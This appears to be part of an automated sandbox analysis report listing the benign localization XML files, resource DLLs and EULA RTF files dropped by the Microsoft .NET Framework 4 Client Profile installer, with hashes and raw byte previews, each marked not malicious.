                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."...5. .C.4.0.5.B.A.O. .2.K.?.>.;.=.8.B.L. .C.A.B.0.=.>.2.:.C. .2. .@.5.6.8.<.5. .A.>.2.<.5.A.B.8.<.>.A.B.8... ...>.?.>.;.=.8.B.5.;.L.=.K.5. .A.2.5.4.5.=.8.O. .A.<... .2. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.D.0.9.;.5. .A.2.5.4.5.=.8.9. .>. .?.@.>.4.C.:.B.5.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1049\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.548909804205606
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:eRBvnUfwVWBC623DV3SD1tt9WfXHT7nMsmxeW1QKPnEtObMacxc8hjeyveCXgFK1:e/C6+URiD1vwLoPeW1LXci2jpvaFHM
                                                                                                                                                                  MD5:7EF74AF6AB5760950A1D233C582099F1
                                                                                                                                                                  SHA1:BF79FF66346907446F4F95E1E785A03CA108EB5D
                                                                                                                                                                  SHA-256:658398F1B68D49ABD37FC3B438CD564992D4100ED2A0271CBF83173F33400928
                                                                                                                                                                  SHA-512:BBBB099AD24F41785706033962ACFC75039F583BEED40A7CDC8EDA366AB2C77F75A5B2792CF6AACB80B39B6B1BB84ECE372BE926FF3F51028FB404D2F6334D78
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......O.....@.......................................... ...*...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1049\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):54456
                                                                                                                                                                  Entropy (8bit):4.950349023670169
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:3CR6rdlWFJv3zGz9tWQ2ni8UNo/8PZrS14Z:3CcrMeDZ
                                                                                                                                                                  MD5:2277852A45DA18B12BEEC5FB6F08CDC9
                                                                                                                                                                  SHA1:E564862D098BD111430C4208EAA1ADD5CD52A601
                                                                                                                                                                  SHA-256:59AD806664E3CE4A024452985C4602D5610126A16FC36ADE018A9756ACCC92CC
                                                                                                                                                                  SHA-512:ED9726D207479E4DF494C6AF17E64909EA6649DDD8BDC3E37229A73270B4A159B2B11C1ADD462871DD40A23033E6B3F8A26E3EA1FA6E3B7316153AF13B316CD2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f44\fbidi \froman\fcharset0\fprq2 Times New Roman CYR;}{\f45\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\pa

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1053\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (622), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):77680
                                                                                                                                                                  Entropy (8bit):3.602060477304833
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w+optBSCVb5v6iMSsCtD7jjktDhHfLSGM3zD0q0Xt//Vvcinnl/06N9mGktJsIO:QqtBSCVb5v69SsuD7jwDkqmGeJsoON
                                                                                                                                                                  MD5:B3B1A89458BEC6AF82C5386D26639B59
                                                                                                                                                                  SHA1:D9320B8CC862F40C65668A40670081079B63CEA1
                                                                                                                                                                  SHA-256:1EF312E8BE9207466FBFDECEE92BFC6C6B7E2DA61979B0908EAF575464E7B7A0
                                                                                                                                                                  SHA-512:478CE08619490ED1ECDD8751B5F60DA1EE4AC0D08D9A97468C3F595AC4376FECA59E9C72DD9C83B00C8D78B298BE757C6F24A422B7BE8C041F780524844998BF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.t.i.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.n.t.e. .k...r.a.s. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.l...g.e... .M.e.r. .i.n.f.o.r.m.a.t.i.o.n. .f.i.n.n.s. .i. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.k.t.i.g.t.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1053\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17752
                                                                                                                                                                  Entropy (8bit):5.196946497211754
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:W9U6qxM8IJu5M/oZVQVWpyeWRLXci2jpvE:WIxMwLVWVMi2jpvE
                                                                                                                                                                  MD5:28813510B82F45868B5BDC67FFF9C9FA
                                                                                                                                                                  SHA1:696A06D1F7B13C20599C53E74969BDC99AB5D30A
                                                                                                                                                                  SHA-256:EB0A73F6BFAF65FAA58440D57145709894E9A5354E840805EC02DCE153332249
                                                                                                                                                                  SHA-512:A01A7C8147138125BBFF7D135FACF255A0284AFABD2BB28D5CB6E54C86A8F1A685855B5561584574A057D4FCFDEF630A10AD262495C58EA5DF974A3249787D9B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........*...............................................P......8p....@.......................................... ...'..............X............................................................................................text...G...........................@..@.rsrc....0... ...(..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1053\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1053
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3865
                                                                                                                                                                  Entropy (8bit):5.329033876405121
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rTBfv+/9TfHTGDXtZEOuAs50Y1EIF19VWMpDHvuKMLDBD+d54+QFEp5Tf+8K+l1S:5ffduAs591EIb9gOpqDoDZQmx2W2
                                                                                                                                                                  MD5:E2F73097FC60F5347BAD1C1E93B2941B
                                                                                                                                                                  SHA1:8564447AF45B488AC713D898405B759365662598
                                                                                                                                                                  SHA-256:72860227092C38AE5E00E24C75E9B263E77BD2032EE597AABE408B9176448097
                                                                                                                                                                  SHA-512:94ECD5BD5053A417BFF3E49C5E7B362843D2C850DA09D389161D4F4D98DE624473E0F143E6A088AB288AB4DA49B7910FFC80F77401009F560B60470FB13609B1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1053\deflangfe1053{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\sb120\sa120\lang1033\b\f0\fs28 TILL\'c4GGSLICENSVILLKOR F\'d6R PROGRAMVARA FR\'c5N MICROSOFT\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\sb120\sa120\fs22 MICROSOFT .NET FRAMEWORK 4 F\'d6R OPERATIVSYSTEMET MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE F\'d6R OPERATIVSYSTEMET MICROSOFT WINDOWS\par..OCH ASSOCIERADE SPR\'c5KPAKET\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1053\b0\f0\fs20 Microsoft Corporation (eller beroende p\'e5 var du bor, ett av dess koncernbolag) licensierar detta till\'e4gg till dig.\lang1033\b \lang1053\b0 Om du innehar licens f\'f6r programvara f\'f6r operativsystemet Microsoft Windows (som detta till\'e4gg g\'e4ller f\'f6r) (\rdblquote pr

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1055\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):76818
                                                                                                                                                                  Entropy (8bit):3.7161950547055933
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:bM8DL5YHRL87mlQg5IgrbGZzwOS8Frc+iI0jJNJ7rtRpUR:bM8DL5YHRL87mlQg5IgrbGZzwOS8FrcS
                                                                                                                                                                  MD5:65E771FED28B924942A10452BBBF5C42
                                                                                                                                                                  SHA1:586921B92D5FB297F35EFFC2216342DAC1AE2355
                                                                                                                                                                  SHA-256:45E30569A756D9BCBC5F9DAE78BDA02751FD25E1C0AEE471CE112CB4464A6EE2
                                                                                                                                                                  SHA-512:D014A2A96F3A5C487EF1CADDD69599DBEC15DA5AD689D68009F1CA4D5CB694105A7903F508476D6FFEC9D81386CB184DF6FC428D34F056190CEE30715514A8F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".K.u.r.u.l.u.m. .u.y.u.m.l.u.l.u.k. .m.o.d.u.n.d.a. ...a.l.1._.a.m.a.z... .D.a.h.a. .f.a.z.l.a. .b.i.l.g.i. .i...i.n. .b.k.z... .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.B.e.n.i.o.k.u. .d.o.s.y.a.s.1.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1055\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17752
                                                                                                                                                                  Entropy (8bit):5.263298426482242
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:Hfp2mDyEkEIb7/dscoGvXdBXbtRS0W0eW0LXci2jpvhPN:H1DyEkEIFscVXdBXbtRVsMi2jpvhl
                                                                                                                                                                  MD5:357A1CBF08A83E657FFAE8639AC1212A
                                                                                                                                                                  SHA1:384DF3D9DBBE27731785D92C257B7BA584FBE5E8
                                                                                                                                                                  SHA-256:DD7337A6C67B39905A9B01C4212667F27EDFB68E86D1099E20EC37B03C51E7B9
                                                                                                                                                                  SHA-512:67E47DF1E462A279C909B7B4255BEC4824554890CFF789BDF6691898A66E71DB007794476508F9290D95ACCE908109AA589A3A01A04125AEBB9EFBF67AEBF25F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........*...............................................P............@.......................................... ...'..............X............................................................................................text...G...........................@..@.rsrc....0... ...(..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1055\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1254, default language ID 1055
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3859
                                                                                                                                                                  Entropy (8bit):5.120677849638168
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:VSfjQOTqfRRTqfSD+vmScfQEz04jMpDLiIzhZLlZhD2:wfcFpcfEo4jOT2
                                                                                                                                                                  MD5:D71A0D5B6CB13901CD35C036D395BE59
                                                                                                                                                                  SHA1:B0F83CF648C2E84119A32AFD2E0EF409BB2047CE
                                                                                                                                                                  SHA-256:A8850F6DBF56B6C55D255E81B15A3D17196EEE89FFBE41CDFCA19205628C1A7B
                                                                                                                                                                  SHA-512:FE7C6E54014AD963F51850973F5AE5872FBA9843F1C20973F5E875008064F870A5217C2C9ADA3D92A3F1B2DF6318D5137814943D6295E72CF27343DF93B957E1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1254\deff0\deflang1055\deflangfe1055{\fonttbl{\f0\fswiss\fprq2\fcharset162 Tahoma;}{\f1\froman\fprq2\fcharset162{\*\fname Times New Roman;}Times New Roman TUR;}{\f2\fswiss\fprq2\fcharset162 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT YAZILIM EK\'dd L\'ddSANS KO\'deULLARI\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang1055\f0 MICROSOFT WINDOWS \'dd\'deLET\'ddM S\'ddSTEMLER\'dd \'dd\'c7\'ddN MICROSOFT .NET FRAMEWORK 4\lang1033\f1\par..\lang1055\f0 MICROSOFT WINDOWS \'dd\'deLET\'ddM S\'ddSTEMLER\'dd \'dd\'c7\'ddN MICROSOFT .NET FRAMEWORK 4 \'ddSTEMC\'dd PROF\'ddL\'dd\par..VE \'ddL\'dd\'deK\'ddL\'dd D\'ddL PAKETLER\'dd\lang1033\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1055\b0\f0 Microsoft Corporation (veya ya\'fead\'fd\'f0\'fdn\'fdz yere g\'f6re bir ba\'f0l\'fd \'feirketi) bu ekin lisans\'fdn\'fd size v

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\2052\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (452), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60684
                                                                                                                                                                  Entropy (8bit):4.338517891382778
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w7yHdhTgqbbT1HjWZez2jtKgst+7x0x8EM5NnqQivGXU4woZukC7FQKAuXR/4mn:dyjg2z2bXXwoZukC7FQKAuXRgcJf
                                                                                                                                                                  MD5:10DA125EEABCBB45E0A272688B0E2151
                                                                                                                                                                  SHA1:6C4124EC8CA2D03B5187BA567C922B6C3E5EFC93
                                                                                                                                                                  SHA-256:1842F22C6FD4CAF6AD217E331B74C6240B19991A82A1A030A6E57B1B8E9FD1EC
                                                                                                                                                                  SHA-512:D968ABD74206A280F74BF6947757CCA8DD9091B343203E5C2269AF2E008D3BB0A17FF600EB961DBF69A93DE4960133ADE8D606FB9A99402D33B8889F2D0DA710
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..[..z.^.e.l.N|Q.['`!j._.L..0.gsQ..~.Oo`.....S..&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.....e.N&.l.t.;./.A.&.g.t.;..0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".xS}. .M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..S...O.[..g.N.^(u.z.^.e.lck8^.L.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\2052\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14168
                                                                                                                                                                  Entropy (8bit):6.010838262457833
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:rsLnUfwVWtTXjuQShyjK7tWUEW5IQKPnEtObMacxc8hjeyveCXMOV:4eCTFhMKZWUEW5ILXci2jpvP
                                                                                                                                                                  MD5:407CDB7E1C2C862B486CDE45F863AE6E
                                                                                                                                                                  SHA1:308AEEBEB1E1663ACA26CE880191F936D0E4E683
                                                                                                                                                                  SHA-256:9DD9D76B4EF71188B09F3D074CD98B2DE6EA741530E4EA19D539AE3F870E8326
                                                                                                                                                                  SHA-512:7B4F43FC24EB30C234F2713C493B3C13928C591C77A3017E8DD806A41CCFEDD53B0F748B5072052F8F9AC43236E8320B19D708903E3F06C59C6ED3C12722494E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@.......y....@.......................................... ............... ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\2052\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5827
                                                                                                                                                                  Entropy (8bit):4.418112026919231
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:M5DBmf0jLTCLLgLTCLLmDjxrDT2k9rkKp7aDKaXzaWZMa/O9wzy6n/MpDTKTGptk:EmfJXoQkRGDtXeWZv/O9XmOdZzQJWBBi
                                                                                                                                                                  MD5:4288C2541843F75C348D825FC8B94153
                                                                                                                                                                  SHA1:E0DD8ED7BDB3C941A589361EE764F49A3619C264
                                                                                                                                                                  SHA-256:C30A7597AA67E2847940E2C24F09B35C07B1EC759ADBCA7C8261141FC1ECCA92
                                                                                                                                                                  SHA-512:7BA9991FE4EED625FE7BEF96A1D3AE70CB7616AAD034236D1A2B346A08B48280CB6C20D2B059DA9953919B0265125FE56DC5F4CC619AC653B4C1164ED564B359
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(.<?[\'7b\'a3\'a5\'ab\'b7\'91\'93}{\*\fchars !"%'),.:\'3b>?]`|\'7d~\'a2\'a8\'af\'b0\'b7\'bb\'92\'94\'85\'89\'9b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT \lang2052\f1\'c8\'ed\'bc\'fe\'b2\'b9\'b3\'e4\'b3\'cc\'d0\'f2\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang2052\f1\'d3\'c3\'d3\'da\lang1033\f0 MICROSOFT WINDOWS \lang2052\f1\'b2\'d9\'d7\'f7\'cf\'b5\'cd\'b3\'b5\'c4\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\lang2052\f1\'d3\'c3\'d3\'da\lang1033\f0 MICROSOFT WINDOWS \lang2052\f1\'b2\'d9\'d7\'f7\'cf\'b5\'cd\'b3\'b5\'c4\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 CLI

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\2070\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (665), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80254
                                                                                                                                                                  Entropy (8bit):3.5905984831890927
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wdLPpRgMjLeUueUA48DYeUOqeUd/iboeuXWpFPYOAjw/BdgysR0AmhRod30J0qf:fenekeCeRuXWpFxgJMh230JMaWs
                                                                                                                                                                  MD5:7FA9926A4BC678E32E5D676C39F8FB97
                                                                                                                                                                  SHA1:BBA4311DD30261A9B625046F8A6EA215516C9213
                                                                                                                                                                  SHA-256:A25EE75C78C24C50440AD7DE9929C6A6E1CC0629009DC0D01B90CBAC177DD404
                                                                                                                                                                  SHA-512:E06423BC1EA50A566D341DC513828608E9B6611FEA81D33FCA471A38F6B2B61B556EA07A5DEC0830F3E87194975D87F267A5E5E1A2BE5E6A86B07C5BB2BDDCB6
                                                                                                                                                                  Malicious:false
